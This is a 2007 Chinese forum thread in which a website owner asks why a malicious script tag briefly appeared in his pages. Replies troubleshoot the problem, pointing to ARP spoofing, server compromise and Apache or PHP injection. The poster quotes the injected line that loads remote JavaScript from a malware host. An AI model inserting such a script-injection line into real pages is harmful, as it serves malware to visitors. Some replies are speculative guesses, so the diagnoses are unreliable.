Chinaunix

标题: 今天出现了奇怪的问题，网页病毒 [打印本页]

作者: hq22 时间: 2007-01-27 11:35
标题: 今天出现了奇怪的问题，网页病毒
今天早上，突然发现浏览自己网站的某些网页，瑞星报出病毒，查看源文件一看，在<html>的最先面加了一段js代码，明显就是那段代码在作怪，马上进入服务器看，可是那个网页好好的，并没有被修改，纳闷，于是以为自己的电脑有毒，可是，一会儿时间，接连接到电话说我们网站有病毒，于是又怀疑是服务器给黑，不过始终不知所解，那个文件根本就没这个病毒代码阿，不过过了一段时间，一个多小时，尽然又好了，刷新网页，那段病毒代码没有了。
今天有没有人碰到我一样的情况阿，我现在怀疑是电信的缘故，在传送过程中被加入这段代码，我的猜测会是正确的吗？如果是服务器的话，那麻烦就大了，说明被黑客黑了

作者: ryanmm 时间: 2007-01-27 13:15
你网页里是不是调用了其他js 或者 iframe
检查一下相应的 .js 和嵌入页面

再者，你服务器肯定是被人攻击了
检查一下吧

[ 本帖最后由 ryanmm 于 2007-1-27 13:18 编辑 ]

作者: platinum 时间: 2007-01-27 13:29

我现在怀疑是电信的缘故，在传送过程中被加入这段代码，我的猜测会是正确的吗？

这个绝不可能，是服务器的原因，是被黑了还是自己中毒了有待考证
如果你保存了当时看到的 js 部分代码，可以搜索一下整个网站目录下的所有文件是否包含这段关键字

作者: jd_chen 时间: 2007-01-27 14:58
你把自己保存的JS代码找点关键字，再到/var/www/html或者你自己的网页目录下cat *.html|grep ？？？看看有没有那些JS代码吧？行的话，给我分哦~~呵呵，因为，我要拿50分出来给人帮我呀~~

[ 本帖最后由 jd_chen 于 2007-1-27 15:00 编辑 ]

作者: showsa 时间: 2007-01-27 15:26
前短时间听说过消息

说有人在中间路由上投放病毒，不知真假

作者: jd_chen 时间: 2007-01-27 19:07

原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息

说有人在中间路由上投放病毒，不知真假

这个不可能吧,除非是电信的人,要不,如果有路由的ID,绝对不会做这种蠢事的,有很多其它的事可以做~~

作者: 網中人 时间: 2007-01-27 21:00
如果有做 tripwire 或備份的習慣，也可先拿來比較，找出有哪些文件被修改過。
在碰到問題那當時，要是你要對系統做 snapshot，那對後面的除錯也很有幫助。
要是你的主機不是你所管的，只是放在別人的 colocation ，那可能的原因就無限多了。

anyway，有發現問題是好事，總被完全不知道要好了... ^_^

作者: 飘雪心辰 时间: 2007-01-27 23:34

原帖由 hq22 于 2007-1-27 11:35 发表于 1楼
今天早上，突然发现浏览自己网站的某些网页，瑞星报出病毒，查看源文件一看，在<html>的最先面加了一段js代码，明显就是那段代码在作怪，马上进入服务器看，可是那个网页好好的，并没有被修改，纳闷，于是 ...

=================
既然浏览器上报出病毒，那么网页里面恳定是有的，不过这段病毒代码放在哪里就要你好好的思量一下了，如果是直接放在网页里的找一下很简单的，用关键字检索（自己在浏览器源文件中截取几个关键字），如果是调用别的网站的代码，你也可用关键字检索（不太灵了），不过对于整个网站文件的目录结构最好是一清二楚的，我就怕，这段病毒代码放在数据库里，那要你对整站的代码熟悉，否则的话，我估计你很难查得到恶意代码到底放在哪张表里。

作者: hq22 时间: 2007-01-28 09:22

原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息

说有人在中间路由上投放病毒，不知真假

我觉的是这个可能，不知道确切不确切？其他情况基本上可排除，网页文件是我自己写的，结构一清二楚，有的页面没有调用数据库，在浏览器上也有这段代码，另外服务器是自己的，就放了一个网站，没其他任何应用，再则，网站上有些页面有这个病毒，而其他一些页面又没有，还有，来的突然，去的也突然。
所以我估计不是服务器原因，察看网页文件，修改时间都是旧的，并且网页文件上不存在任何可能的那段代码，除非服务器中病毒，有进程在生成页面时自动加上。

作者: fuyic 时间: 2007-01-28 12:11
有非法劫持这个说法吧，有的时候使用CDN，在CDN的镜像上会有被人恶意修改加入病毒的情况，前些日子遇到过一次，不过楼主这个好像没用上CDN，不知道是不是和我说的状况差不多。

作者: HonestQiao 时间: 2007-01-28 13:24

原帖由 hq22 于 2007-1-28 09:22 发表于 9楼

我觉的是这个可能，不知道确切不确切？其他情况基本上可排除，网页文件是我自己写的，结构一清二楚，有的页面没有调用数据库，在浏览器上也有这段代码，另外服务器是自己的，就放了一个网站，没其他任何应用 ...

楼主可以按照我的步骤测试一下子么？

步骤如下：
1. 你在你当前的电脑访问这个网页，是否出现类似的问题？
2. 如果1成立，则让其他地方的网友访问1的页面，是否出现问题？
3. 在服务器，通过wget来访问1的网页，然后把文件下载回来，看看是否有类似的问题？

这样子我们可以很快的锁定问题可能的范围。

作者: hq22 时间: 2007-01-28 14:19

原帖由 HonestQiao 于 2007-1-28 13:24 发表于 11楼

楼主可以按照我的步骤测试一下子么？

步骤如下：
1. 你在你当前的电脑访问这个网页，是否出现类似的问题？
2. 如果1成立，则让其他地方的网友访问1的页面，是否出现问题？
3. 在服务器，通过wget来访 ...

1,2都出现这个问题，3没有试，当时有想到就好了，可惜现在没有这个问题了。从页面突然出现病毒跟突然消失看，网页文件被改得可能性很少。我还是估计是服务器托管商的什么设备出问题，而不是我的服务器。

作者: platinum 时间: 2007-01-28 21:08

原帖由 showsa 于 2007-1-27 15:26 发表于 5楼
前短时间听说过消息

说有人在中间路由上投放病毒，不知真假

不可能
路由是网络层的东西，网页是应用层的东西

作者: mailjzwu_1 时间: 2007-01-29 02:35
有可能是你使用计数器，或其他链接其他网站的
查一下，数据库表也值得怀疑,有时设计程序是，做什么加密，有MD5之类等转换，查起来，不是自己做的程序，查起来没头没尾的，特别不规范说明和代码的，更不用看
无论是ＡSP, PHP,都会有给人加入病毒代码的可能性，.net, jsp相对少点机会．
连接数据库文件有没给加东东在里面

作者: artou 时间: 2007-01-29 11:22
和我前一阶段遇到的问题差不多
1、你把apache换个端口看看那段js代码还在不在？
2、用同一个网段的其它服务器访问这个网页看看？
3、服务器彻底检查一下。

如果是在路由上被修改，那是没有解决办法的。。。只能换机房。。。

作者: skylove 时间: 2007-01-29 12:22
楼主是租用的虚拟主机吗？如果是的话。。。我大概知道问题出在哪了

作者: HonestQiao 时间: 2007-01-29 15:07

原帖由 skylove 于 2007-1-29 12:22 发表于 16楼
楼主是租用的虚拟主机吗？如果是的话。。。我大概知道问题出在哪了

ext_filter可以做到这个。

作者: artou 时间: 2007-01-29 15:17

原帖由 HonestQiao 于 2007-1-29 15:07 发表于 17楼

ext_filter可以做到这个。

请介绍一下ext_filter。。。

作者: hq22 时间: 2007-01-29 15:19

原帖由 artou 于 2007-1-29 11:22 发表于 15楼
和我前一阶段遇到的问题差不多
1、你把apache换个端口看看那段js代码还在不在？
2、用同一个网段的其它服务器访问这个网页看看？
3、服务器彻底检查一下。

如果是在路由上被修改，那是没有解决办法的。。 ...

你是怎么个情况？查处问题来了吗？
我是自己的服务器，就运行了一个网站，linux+apache2.2+php5+mysql5，按道理页面被植入代码应该是服务器上的文件也被修改，可是我进去看服务器上页面并没有被任何改动，就是在IE上浏览的时候，莫名在页面最前面多出<script src=http://www.xxx.com/1.js></script>这段代码，这个网址我忘记了。

作者: 飘雪心辰 时间: 2007-01-29 15:44
============================
你的php不是配置成自动附加某一文件的话，你的这段调用js的代码恳定是在你服务器上的。
楼主呀，我就算是代表我们这一些人，能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。

是福不是祸，是祸躲不过。

[ 本帖最后由飘雪心辰于 2007-1-29 15:45 编辑 ]

作者: artou 时间: 2007-01-29 15:44
我的情况和你有点不同，我是网页里有个链接地址被修改了。但本机正常，apache换端口访问正常，同一网段其它机器访问正常。在这里和linuxsir发帖，都无人回答，最终也没查出问题。。。

作者: hq22 时间: 2007-01-29 16:01

原帖由 飘雪心辰 于 2007-1-29 15:44 发表于 20楼
============================
你的php不是配置成自动附加某一文件的话，你的这段调用js的代码恳定是在你服务器上的。
楼主呀，我就算是代表我们这一些人，能不能把你的这张病毒网页地址发给偶们这帮人瞧瞧。 ...

现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

作者: jd_chen 时间: 2007-01-29 17:22

原帖由 hq22 于 2007-1-29 16:01 发表于 22楼

现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

我的机子,卡吧开这个网页,不怕吧?

作者: skylove 时间: 2007-01-29 18:17

原帖由 hq22 于 2007-1-29 16:01 发表于 22楼

现在想起来了，是这个地址
<script src=http://waigua9999.com/1.js></script>
申明：浏览前请确保自己的电脑不被感染病毒，由此造成的损失与我无关。

您给的这个url的ip是来自 61.152.114.102 ，请核对是否与您的租用主机在同一主机上？或者同一段ip内？？？如果是的话，在server上动了手脚地可能性粉大；

如果不是，那么能否说说您的web构成：比如server那边是使用什么脚本语言，或者如果是静态html的话是否存在从数据库里取广告，或者取第三方数据/js调用的情形？？？

作者: skylove 时间: 2007-01-29 18:25
访问了那页面。。。最后出来个。。。

锄禾日当午

作者: hq22 时间: 2007-01-29 18:48

原帖由 skylove 于 2007-1-29 18:17 发表于 24楼

您给的这个url的ip是来自 61.152.114.102 ，请核对是否与您的租用主机在同一主机上？或者同一段ip内？？？如果是的话，在server上动了手脚地可能性粉大；

如果不是，那么能否说说您的web构成：比如serv ...

我的ip段是202.，跟他无关，网页文件是我写的，没有你说的任何可能，我基本确定不是网页文件原因，要么是网络传输过程中添加的，要么是服务器被开了什么进程，等访问网页时候自动添加上去的。

作者: platinum 时间: 2007-01-29 18:49
问一下楼主，这个现象还有可能重现吗？
另外，apache 的日志里有什么敏感信息没有，包括 access 和 error 里面，在发现有病毒的时间前？

作者: artou 时间: 2007-01-30 14:39
经过测试使用Ext_Filter可以达到修改网页任何部分的功能，但是必须修改apache的conf来达到，如果conf未被修改，那是怎么达到的呢？

作者: xmbbx 时间: 2007-01-30 14:59
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.

作者: 飘雪心辰 时间: 2007-01-30 15:29
==================
你可对准网站目录，先检索里面有没直接包含此文件的页面。
比如检索/var/www/html/目录：

grep -Ri '1.js' /var/www/html/
grep -Ri '9999' /var/www/html/
grep -Ri 'waigua' /var/www/html/

复制代码

有没结果。
你用php,那php的配置文件里面这两语句后面有没什么东东：

; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =

作者: artou 时间: 2007-01-30 16:10

原帖由 xmbbx 于 2007-1-30 14:59 发表于 29楼
同网段中有别的电脑中病毒了,造成类似arp欺骗的情况,前段时间我们也出现这个问题,主机是托管的,让IDC去查,没多久就解决了.

能再说的详细点吗？

作者: 網中人 时间: 2007-01-30 16:12
網頁是你自己寫的沒問題。
但機器也是“整台”由你自己來管？

如果你是放在別人的機房，請確定你機器的“獨立性”。

作者: 山东大葱 时间: 2007-02-02 21:11

今天有没有人碰到我一样的情况阿，我现在怀疑是电信的缘故，在传送过程中被加入这段代码，我的猜测会是正确的吗？如果是服务器的话，那麻烦就大了，说明被黑客黑了

纯属推卸责任！
---->网页木马！
服务器是否被攻破？管理员密码是否外泄？网页是否存在注入等漏洞？网站后台管理员密码是否强壮？密码是否已经MD5加密？网页什么时候修改的？是你修改的吗？去掉那段代码是否还提示有病毒？

作者: 第二场雪 时间: 2007-02-12 18:08
和你们说的都无关这是arpsniffer的一种，数据包在送出到达网关的过程中被劫持主要原因是内网有计算机被控制，通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性，所以劫持的成功率不一样。
呵呵。客户有次遇到过，最后原因就是这个，重装系统都没用，找出那个计算机是关键

作者: dy810810 时间: 2007-03-14 23:01
兄弟们，我的问题跟他差不多，比较相似，收集了一些资料，大家一起帮看看
http://linux.chinaunix.net/bbs/viewthread.php?tid=891773&extra=page%3D1

作者: yjypop 时间: 2007-03-15 12:00
是IIS的扩展里多了一个DLL调用，这个问题我见过

作者: tangbank 时间: 2007-05-05 14:50
第二场雪说的完全正确，
这是一种arp攻击,这个挂代码不是每次都成功的。
关键问题是如何找出arp攻击的服务器.
ps:这个服务器肯定和你的服务器在同一个网关下面的

作者: asklxf 时间: 2007-05-06 19:22
上次听说上海电信的一个路由器被黑客挟持了，所有经过的网页都被挂病毒，楼主打电话问问托管商

作者: oklinuxok 时间: 2007-05-08 14:40
可能被arp欺骗攻击了

作者: theanswer 时间: 2007-05-08 14:43
标题: 对比以前的备份
对比以前的备份对比以前的备份对比以前的备份

作者: 程序情人 时间: 2007-05-09 09:48
呵呵,关注一下

作者: tangbank 时间: 2007-05-23 23:50
还没解决阿。。。

作者: tangbank 时间: 2007-05-23 23:51
QQ:240075 可以给你一个工具

作者: 75106500 时间: 2007-05-28 02:19
呵可。。学到东西了~~~

作者: daxian195 时间: 2007-06-20 00:14
基本可以肯定是arp攻击。可以装一个arp防火墙，看局域岗内哪台机在攻击。先断掉它的网线，再杀毒，这样基本上就可以解决了。

作者: xdsnet 时间: 2007-06-25 09:52
要不是你局域网问题，被arp攻破了。

作者: ljcwmx 时间: 2007-06-25 11:08
ARP欺骗，是局域网中有的机器中招了！

作者: elog 时间: 2007-06-25 14:20
前段时间我所在的网络也出现了类似问题，经查是中了arp病毒，把局域网的的所有电脑的TCP/IP包都转到了其中的一台电脑里，那台电脑负责把含有http头的包取出来，加上病毒码，然后再发给局域网中的电脑，你可以去看看是不是这个原因。

作者: freyson 时间: 2007-07-10 17:05
这个问题我也碰到过,你只要用你的这台机器打开一些别的大的网站,看看是否有代码,如果都有,保证是你局域网内的毒,查杀一下.根据你的问题,我敢肯定是你的内网中毒了.

作者: 金西 时间: 2007-07-15 17:22
直接用抓包工具分析网络信息

作者: wheel 时间: 2007-07-20 14:01
载入 http://waigua9999.com 时发生错误：

服务器超时
到主机 waigua9999.com 端口 80 的连接

作者: wheel 时间: 2007-07-20 14:04
如果你的服务器是linux那就ssh 到服务器lynx http://127.0.0.1 看下,不就明白是否是net的问题还是本机给黑了?

欢迎光临 Chinaunix (http://bbs.chinaunix.net/)